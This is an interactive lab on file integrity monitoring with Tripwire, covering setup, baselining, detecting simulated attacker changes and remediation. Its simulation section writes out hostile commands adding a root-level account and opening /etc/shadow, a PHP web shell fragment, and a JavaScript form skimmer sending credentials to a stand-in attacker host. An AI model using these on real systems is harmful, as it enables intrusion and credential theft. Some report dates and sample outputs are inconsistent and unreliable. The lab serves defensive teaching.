File Integrity Monitoring Challenge

Welcome to the File Integrity Monitoring Challenge

This interactive challenge will teach you how to implement and use file integrity monitoring (FIM) systems like Tripwire to detect unauthorized changes to critical files. You'll learn to set up monitoring, detect modifications, and investigate security incidents.

What is File Integrity Monitoring?

File Integrity Monitoring (FIM) is a security process that validates the integrity of operating system and application files by comparing the current state of files to a known, good baseline. If a monitored file is changed, added, or deleted, the FIM system alerts security personnel to investigate the change.

FIM is crucial for detecting unauthorized modifications that might indicate a security breach, malware infection, or insider threat activity.

Introduction

FIM Setup

Creating Baseline

Change Detection

Investigation

Completion

Understanding File Integrity Monitoring

File Integrity Monitoring (FIM) systems like Tripwire are essential security tools that help protect critical systems by:

Detecting unauthorized file modifications in real-time or through scheduled scans
Ensuring compliance with security standards like PCI DSS, HIPAA, and SOC 2
Providing evidence for forensic investigations after security incidents
Validating system integrity after patches and updates

How FIM Works

Baseline Creation: A cryptographic hash (checksum) is calculated for each monitored file
Ongoing Monitoring: New hashes are regularly calculated and compared to the baseline
Change Detection: Any differences trigger alerts for security investigation
Reporting: Detailed information about file changes is provided

Key FIM Features

Real-time Monitoring: Immediate detection of suspicious changes
File Attributes: Tracking permissions, ownership, size, and timestamps
Whitelisting: Approving expected changes (e.g., during updates)
Centralized Management: Monitoring multiple systems from one console

Common FIM Tools

Tripwire: One of the original and most widely used FIM solutions
OSSEC: Open-source host-based intrusion detection with FIM capabilities
Wazuh: Fork of OSSEC with enhanced features and integration
File Integrity Monitoring in EDR tools: CrowdStrike, Carbon Black, etc.

Challenge Scenario

In this challenge, you are a security analyst responsible for protecting critical server infrastructure. You've been tasked with setting up file integrity monitoring to detect any unauthorized changes to system files.

During the challenge, you will:

Configure Tripwire on a simulated Linux server
Create a baseline of critical system files
Detect unauthorized changes made by a potential attacker
Investigate the changes and identify the security implications

Setting Up File Integrity Monitoring

Let's begin by setting up Tripwire, a powerful file integrity monitoring solution. Tripwire works by creating a baseline database of file checksums and then periodically comparing the current state of files against this baseline to detect changes.

Install Tripwire

First, we need to install Tripwire on our simulated Ubuntu server:

Terminal

server@ubuntu:~$ sudo apt update

Get:1 http://security.ubuntu.com/ubuntu focal-security InRelease [114 kB]
Get:2 http://archive.ubuntu.com/ubuntu focal InRelease [265 kB]
Get:3 http://archive.ubuntu.com/ubuntu focal-updates InRelease [114 kB]
[...]
Reading package lists... Done
Building dependency tree
Reading state information... Done
All packages are up to date.

server@ubuntu:~$ sudo apt install tripwire

Reading package lists... Done
Building dependency tree
Reading state information... Done
The following packages will be installed:
tripwire
0 upgraded, 1 newly installed, 0 to remove and 0 not upgraded.
Need to get 1,052 kB of archives.
After this operation, 3,245 kB of additional disk space will be used.
Get:1 http://archive.ubuntu.com/ubuntu focal/universe amd64 tripwire amd64 2.4.3.7-1 [1,052 kB]
Fetched 1,052 kB in 2s (526 kB/s)

During installation, you'll be prompted to set up two passphrases:
- Site Passphrase: used for the Tripwire site configuration file
- Local Passphrase: used for the Tripwire database

Setting up tripwire (2.4.3.7-1) ...

Creating configuration file /etc/tripwire/twcfg.txt with new version
Creating configuration file /etc/tripwire/twpol.txt with new version

----------------------------------------------------------------------
The Tripwire site and local passphrases are used to
sign a variety of files, such as the configuration,
policy, and database files.

Passphrases must be at least 8 characters long.

See the Tripwire manual for more information.
----------------------------------------------------------------------

Creating key files...

(When selecting a passphrase, keep in mind that good passphrases typically
have upper and lower case letters, digits and punctuation marks, and are
at least 8 characters in length.)

Enter the site keyfile passphrase: ********
Verify the site keyfile passphrase: ********
Generating key (this may take several minutes)...Key generation complete.

(When selecting a passphrase, keep in mind that good passphrases typically
have upper and lower case letters, digits and punctuation marks, and are
at least 8 characters in length.)

Enter the local keyfile passphrase: ********
Verify the local keyfile passphrase: ********
Generating key (this may take several minutes)...Key generation complete.

Generating Tripwire configuration files...

Processing configuration file...

The configuration file: /etc/tripwire/twcfg.txt
Wrote configuration file: /etc/tripwire/tw.cfg
A clear-text version of the Tripwire configuration file has been
preserved at /etc/tripwire/twcfg.txt.

Processing policy file...

The policy file: /etc/tripwire/twpol.txt
Wrote policy file: /etc/tripwire/tw.pol
A clear-text version of the Tripwire policy file has been preserved at
/etc/tripwire/twpol.txt.

The Tripwire installation is complete.

Review Tripwire Configuration

Tripwire uses two main configuration files:

twcfg.txt: Contains system-specific settings like file locations and email notification options
twpol.txt: Defines which files and directories to monitor and what properties to check

Let's examine the default policy file to understand what Tripwire will monitor:

Terminal

server@ubuntu:~$ sudo head -n 30 /etc/tripwire/twpol.txt

##############################################################################
# #
# Default Tripwire Policy for Ubuntu #
# #
##############################################################################

@@section GLOBAL

TWROOT=/usr/sbin;
TWBIN=/usr/sbin;
TWPOL="/etc/tripwire";
TWDB="/var/lib/tripwire";
TWSKEY="/etc/tripwire";
TWLKEY="/etc/tripwire";
TWREPORT="/var/lib/tripwire/report";
HOSTNAME=localhost;

@@section FS

# These variables are used to define what properties
# we will scan for on different file types

# SEC_CRIT Scans for changes to the file properties:
# permissions, owner, group, size, mtime, ctime, inode
# links, growing size

# SEC_SUID Scans for changes to the file properties:
# permissions, owner, group, size, mtime, ctime, inode
# links, growing size

Customize Tripwire Policy

For this challenge, we'll create a simplified custom policy to monitor specific critical files and directories. Let's create a custom policy file focused on key system areas:

Terminal

server@ubuntu:~$ sudo cp /etc/tripwire/twpol.txt /etc/tripwire/twpol.txt.bak

server@ubuntu:~$ sudo nano /etc/tripwire/twpol.txt.custom

# Custom Tripwire Policy File for FIM Challenge

@@section GLOBAL

TWROOT=/usr/sbin;
TWBIN=/usr/sbin;
TWPOL="/etc/tripwire";
TWDB="/var/lib/tripwire";
TWSKEY="/etc/tripwire";
TWLKEY="/etc/tripwire";
TWREPORT="/var/lib/tripwire/report";
HOSTNAME=localhost;

@@section FS

# File property masks
SEC_CRIT = $(PN) $(PX) $(PALL) -SHa ; # Critical files
SEC_BIN = $(PN) $(PX) $(PALL) -SHa ; # Binaries
SEC_CONFIG = $(PN) $(PX) $(PALL) -SHa ; # Config files
SEC_LOG = $(PN) $(PX) $(PALL) -SHa ; # Log files
SIG_LOW = 33 ; # Non-critical files
SIG_MED = 66 ; # User binaries
SIG_HI = 100 ; # Critical files

@@section POLICY

# Critical system binaries
{
/bin -> $(SEC_BIN) (recurse=true) ;
/sbin -> $(SEC_BIN) (recurse=true) ;
/usr/bin -> $(SEC_BIN) (recurse=true) ;
/usr/sbin -> $(SEC_BIN) (recurse=true) ;
}

# Critical system configuration
{
/etc -> $(SEC_CONFIG) (recurse=false) ;
/etc/passwd -> $(SEC_CRIT) ;
/etc/shadow -> $(SEC_CRIT) ;
/etc/group -> $(SEC_CRIT) ;
/etc/ssh -> $(SEC_CONFIG) (recurse=true) ;
/etc/tripwire -> $(SEC_CONFIG) (recurse=true) ;
}

# Web server files (for the challenge)
{
/var/www/html -> $(SEC_CONFIG) (recurse=true) ;
}

server@ubuntu:~$ sudo cp /etc/tripwire/twpol.txt.custom /etc/tripwire/twpol.txt

server@ubuntu:~$ sudo tripwire --update-policy /etc/tripwire/twpol.txt

Enter your local passphrase: ********
Parsing policy file: /etc/tripwire/twpol.txt
Generating signed policy file: /etc/tripwire/tw.pol

Please enter your site passphrase: ********

Wrote policy file: /etc/tripwire/tw.pol
Policy update complete.

Key Tripwire Commands

tripwire --init

Initializes the Tripwire database by creating a baseline of the monitored files according to the policy

tripwire --check

Checks the current state of monitored files against the baseline and generates a report of any changes

tripwire --update-policy [policy_file]

Updates the Tripwire policy with changes from the specified text policy file

tripwire --update --twrfile [report_file]

Updates the Tripwire database with changes found in the specified report file (used to acknowledge legitimate changes)

Creating the Integrity Baseline

Now that we've installed and configured Tripwire, we need to create a baseline of our system's files. This baseline will serve as the "known good state" against which future file states will be compared.

Initialize the Tripwire Database

Let's create the initial baseline database using our custom policy:

Terminal

server@ubuntu:~$ sudo tripwire --init

Please enter your local passphrase: ********

Parsing policy file: /etc/tripwire/tw.pol
Generating the database...
*** Processing Unix File System ***

### Phase 1: Reading configuration files
### Phase 2: Generating file list
### Phase 3: Creating file information database
### Phase 4: Searching for invariant files
### Phase 5: Pruning unneeded file information
### Phase 6: Calculating file hashes
### Phase 7: Storing database

Wrote database file: /var/lib/tripwire/localhost.twd

The database was successfully generated.

Verify the Initial Database

Let's run a check immediately after creating the baseline to make sure everything is working correctly:

Terminal

server@ubuntu:~$ sudo tripwire --check

Perfect! There are no violations reported because we just created the baseline. This means Tripwire is successfully monitoring our files according to the policy we defined.

Understand What's Being Monitored

Let's examine what files are being monitored in more detail. We'll look at a key area defined in our policy - the web server files:

Terminal

server@ubuntu:~$ ls -la /var/www/html/

total 28
drwxr-xr-x 2 www-data www-data 4096 Apr 1 11:30 .
drwxr-xr-x 3 root root 4096 Apr 1 11:25 ..
-rw-r--r-- 1 www-data www-data 9172 Apr 1 11:30 index.html
-rw-r--r-- 1 www-data www-data 2874 Apr 1 11:30 login.php
-rw-r--r-- 1 www-data www-data 1507 Apr 1 11:30 styles.css

server@ubuntu:~$ cat /var/www/html/index.html | head -10

<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Company Internal Portal</title>
<link rel="stylesheet" href="styles.css">
</head>
<body>
<header>

These are the web server files that Tripwire is monitoring. Any changes to these files will be detected during the integrity check.

What Tripwire Monitors

Tripwire can monitor various file properties including:

File Content: Detected through cryptographic hash changes (MD5, SHA-1)
Permissions: File access rights (read, write, execute)
Ownership: User and group ownership of files
Size: File size in bytes
Timestamps: Modification time (mtime), access time (atime), and creation time (ctime)
Inode: The file's reference number in the filesystem
Link Count: Number of hard links to the file

By monitoring these properties, Tripwire can detect various types of unauthorized changes, including content modifications, permission changes, and ownership transfers.

Detecting Unauthorized Changes

In this phase of the challenge, we'll simulate an attacker making unauthorized changes to our system and use Tripwire to detect these modifications.

Scenario

Your company's web server has been targeted by an attacker who has gained access to the system. They have made several changes to critical files in an attempt to establish persistence and potentially extract sensitive information.

As the security analyst, you need to run a Tripwire integrity check to identify what files have been modified.

Simulate Unauthorized Changes

For the purpose of this challenge, we'll simulate an attacker making several changes to our system:

Terminal

server@ubuntu:~$ # Simulating unauthorized changes

server@ubuntu:~$ sudo bash -c "echo 'malicious_user:x:0:0:Malicious User:/home/malicious_user:/bin/bash' >> /etc/passwd"

server@ubuntu:~$ sudo chmod 777 /etc/shadow

server@ubuntu:~$ sudo bash -c "cat > /var/www/html/backdoor.php << 'EOL' '; \$cmd = (\$_REQUEST['cmd']); system(\$cmd); echo ''; } ?> EOL"

server@ubuntu:~$ sudo cat >> /var/www/html/index.html << 'EOL' EOL

server@ubuntu:~$ sudo touch -a -m -t 202504010800 /var/www/html/backdoor.php

The attacker has made the following changes:

Added a new root-level user to /etc/passwd (privilege escalation)
Changed permissions on /etc/shadow to world-readable (exposing password hashes)
Added a backdoor PHP script to the web directory (remote code execution)
Modified index.html to include a JavaScript keylogger (credential theft)
Attempted to hide the backdoor by changing its timestamp

Run Tripwire Check to Detect Changes

Now let's run Tripwire to detect these unauthorized changes:

Terminal

server@ubuntu:~$ sudo tripwire --check

Please enter your local passphrase: ********

Parsing policy file: /etc/tripwire/tw.pol
*** Processing Unix File System ***

### Phase 1: Reading configuration files
### Phase 2: Generating file list
### Phase 3: Creating file information database
### Phase 4: Searching for invariant files
### Phase 5: Pruning unneeded file information
### Phase 6: Calculating file hashes
### Phase 7: Comparing database against system

===============================================================================
Object name: /etc/passwd
Property: Modified Object

Expected: 1 1043 100644 root root 4925 1617234567
Observed: 1 1044 100644 root root 5015 1617284987

===============================================================================
Object name: /etc/shadow
Property: Modified Object

Expected: 1 1177 100640 root shadow 1673 1617234567
Observed: 1 1177 100777 root shadow 1673 1617284987

===============================================================================
Object name: /var/www/html
Property: Added: "/var/www/html/backdoor.php"

===============================================================================
Object name: /var/www/html/index.html
Property: Modified Object

Expected: 1 1207 100644 www-data www-data 9172 1617234567
Observed: 1 1406 100644 www-data www-data 9632 1617284987

===============================================================================

Total objects scanned: 1548
Total violations found: 4

Report generated at: /var/lib/tripwire/report/localhost-20250402-134522.twr

Tripwire has successfully detected all the unauthorized changes!

Generate a Detailed Report

Let's generate a more detailed report to better understand the changes:

Terminal

server@ubuntu:~$ sudo twprint --twrfile /var/lib/tripwire/report/localhost-20250402-134522.twr --report-level 3

Tripwire(R) 2.4.3.7 Integrity Check Report

Report generated by: root
Report created on: Wed Apr 2 13:45:22 2025
Database last updated on: Wed Apr 1 12:15:30 2025

===============================================================================
Rule Summary:
-------------------------------------------------------------------------------
Section: Unix File System

Rule Name Severity Level Added Removed Modified
-------------------------------------------------------------------------------
Critical system configuration 100 0 0 2
Web server files 100 1 0 1

===============================================================================
Object Summary:
-------------------------------------------------------------------------------
# Section: Unix File System

Added Objects: 1
-------------------------------------------------------------------------------
1. /var/www/html/backdoor.php

Modified Objects: 3
-------------------------------------------------------------------------------
1. /etc/passwd
Observed: Size, Modify time

2. /etc/shadow
Observed: Mode, Modify time

3. /var/www/html/index.html
Observed: Size, Modify time

===============================================================================
Object Details:
-------------------------------------------------------------------------------

#1: Object name: /etc/passwd
Property: Modified Object

Property: Size
Expected: 4925
Observed: 5015

Property: Modify Time
Expected: Thu Apr 1 12:02:47 2025
Observed: Fri Apr 2 13:36:27 2025

#2: Object name: /etc/shadow
Property: Modified Object

Property: Mode
Expected: -rw-r-----
Observed: -rwxrwxrwx

Property: Modify Time
Expected: Thu Apr 1 12:02:47 2025
Observed: Fri Apr 2 13:37:08 2025

#3: Object name: /var/www/html
Property: Added: "/var/www/html/backdoor.php"

#4: Object name: /var/www/html/index.html
Property: Modified Object

Property: Size
Expected: 9172
Observed: 9632

Property: Modify Time
Expected: Thu Apr 1 11:30:00 2025
Observed: Fri Apr 2 13:38:47 2025

===============================================================================
Error Report:
-------------------------------------------------------------------------------
No Errors

===============================================================================

/etc/passwd

/etc/shadow

backdoor.php

index.html

File: /etc/passwd

This file contains user account information. The attacker has added a new root-level account.

Changes Detected:

Size: Increased from 4925 to 5015 bytes
Modification Time: Changed to Fri Apr 2 13:36:27 2025

Diff View:

+ malicious_user:x:0:0:Malicious User:/home/malicious_user:/bin/bash

Security Impact:

High severity. The attacker has created a new account with root privileges (UID 0), allowing complete administrative access to the system.

File: /etc/shadow

This file contains encrypted password hashes for user accounts. The attacker has changed its permissions.

Changes Detected:

Permissions: Changed from 640 (rw-r-----) to 777 (rwxrwxrwx)
Modification Time: Changed to Fri Apr 2 13:37:08 2025

Security Impact:

High severity. By changing the permissions to world-readable and writable, any user on the system can read or modify password hashes. This could lead to password cracking or unauthorized password changes.

File: /var/www/html/backdoor.php

This is a new file added by the attacker that allows remote command execution on the server.

Changes Detected:

File Added: New file detected in monitored directory

File Content:

                        ';
                        $cmd = ($_REQUEST['cmd']);
                        system($cmd);
                        echo '';
                        }
                        ?>
                    

Security Impact:

Critical severity. This PHP script creates a web shell that allows the attacker to execute arbitrary commands on the server with the permissions of the web server user.

File: /var/www/html/index.html

The main website page has been modified to include malicious JavaScript code.

Changes Detected:

Size: Increased from 9172 to 9632 bytes
Modification Time: Changed to Fri Apr 2 13:38:47 2025

Added Code:

                    + <script>
                    + document.addEventListener('DOMContentLoaded', function() {
                    +     // Hidden code to steal login credentials
                    +     document.querySelector('form').addEventListener('submit', function(e) {
                    +         var username = document.getElementById('username').value;
                    +         var password = document.getElementById('password').value;
                    +         var img = new Image();
                    +         img.src = 'https://malicious-server.com/collect.php?u=' + encodeURIComponent(username) + '&p=' + encodeURIComponent(password);
                    +     });
                    + });
                    + </script>

Security Impact:

High severity. The attacker has added JavaScript code that steals user credentials when they log in to the website and sends them to a malicious server.

Investigating the Incident

Now that we've detected unauthorized changes to our system files, we need to investigate the incident to understand its scope and impact.

Review All File Changes

Let's summarize the unauthorized changes detected by Tripwire:

File	Change Type	Details	Security Impact
/etc/passwd	Modified	Added root-level user account	Critical - Unauthorized root access
/etc/shadow	Permission Change	Changed from 640 to 777	Critical - Password hash exposure
/var/www/html/backdoor.php	New File	Web shell for command execution	Critical - Remote code execution
/var/www/html/index.html	Modified	Added malicious JavaScript	High - Credential theft

Determine Attack Timeline

Based on the Tripwire report, all file modifications occurred on Friday, April 2, 2025, between 13:36 and 13:38. This suggests a coordinated attack rather than random system changes.

The attack sequence appears to be:

Added a backdoor user account to /etc/passwd (13:36)
Made /etc/shadow world-readable/writable (13:37)
Added a web shell backdoor.php (timestamp manipulated)
Modified index.html to add credential stealing code (13:38)

Assess Security Impact

This appears to be a sophisticated attack with multiple components:

Persistence: The attacker created a root-level user account to maintain access even if other backdoors are discovered
Privilege Escalation: By making /etc/shadow world-writable, they could modify any user's password
Remote Access: The PHP web shell provides command execution capabilities
Data Theft: The JavaScript code steals user credentials
Anti-Forensics: Attempted to hide the backdoor by modifying timestamps

This combination suggests a targeted attack aimed at maintaining long-term access to the system and stealing sensitive information.

Remediation Plan

Based on our investigation, here's a remediation plan to address the compromise:

Immediate Actions:
- Remove the malicious user account from /etc/passwd
- Restore proper permissions (640) on /etc/shadow
- Remove the backdoor.php file
- Remove the malicious JavaScript from index.html
Additional Security Measures:
- Change all system passwords
- Check for additional backdoors or modified files
- Investigate how the attacker gained initial access
- Enhance monitoring and alerting
Long-term Improvements:
- Implement more comprehensive file integrity monitoring
- Set up real-time alerting for critical file changes
- Deploy additional security controls (WAF, HIDS, etc.)
- Conduct security awareness training

Best Practices for File Integrity Monitoring

Based on this incident, here are some recommendations for effective file integrity monitoring:

Monitor the Right Files: Focus on critical system files, configuration files, and application code
Regular Checks: Run scheduled checks at least daily, with real-time monitoring for critical files
Secure Baseline Database: Store the baseline database on read-only media or a separate secure system
Change Management: Update the baseline after legitimate changes to reduce false positives
Alert Integration: Integrate FIM alerts with your SIEM or security monitoring system
Policy Refinement: Regularly review and update the monitoring policy

Challenge Completion

Congratulations! You have successfully completed the File Integrity Monitoring Challenge. You've learned how to:

Install and configure Tripwire for file integrity monitoring
Create a baseline of critical system files
Detect unauthorized changes to monitored files
Investigate security incidents using FIM data
Develop remediation plans to address security breaches

File integrity monitoring is a critical security control that can help organizations detect unauthorized changes to important files and respond quickly to potential security incidents.

Certificate of Completion

File Integrity Monitoring Challenge

This certificate is awarded to

Aziz

For successfully completing the File Integrity Monitoring Challenge and demonstrating proficiency in detecting and investigating unauthorized system changes.

Aziz Alghamdi

Instructor

May 1, 2025

Date

Download Certificate Share Certificate

Return to Interactive Learning